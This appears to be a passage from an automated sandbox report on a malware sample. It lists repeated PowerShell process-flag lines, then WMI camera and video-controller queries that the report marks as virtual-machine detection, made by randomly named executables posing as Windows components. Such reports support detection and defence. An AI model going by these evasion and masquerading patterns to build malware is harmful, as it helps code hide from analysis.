Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Memory allocated: 1500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Memory allocated: 1B130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Memory allocated: 1A60000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Memory allocated: 1B660000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Memory allocated: 1650000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Memory allocated: 1B3F0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Memory allocated: 1730000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Memory allocated: 1B1B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Memory allocated: 1810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Memory allocated: 1B500000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Memory allocated: 1040000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Memory allocated: 1ADA0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Memory allocated: 18B0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Memory allocated: 1B100000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Memory allocated: 1120000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Memory allocated: 1AA30000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Memory allocated: 1570000 memory reserve \| memory write watch
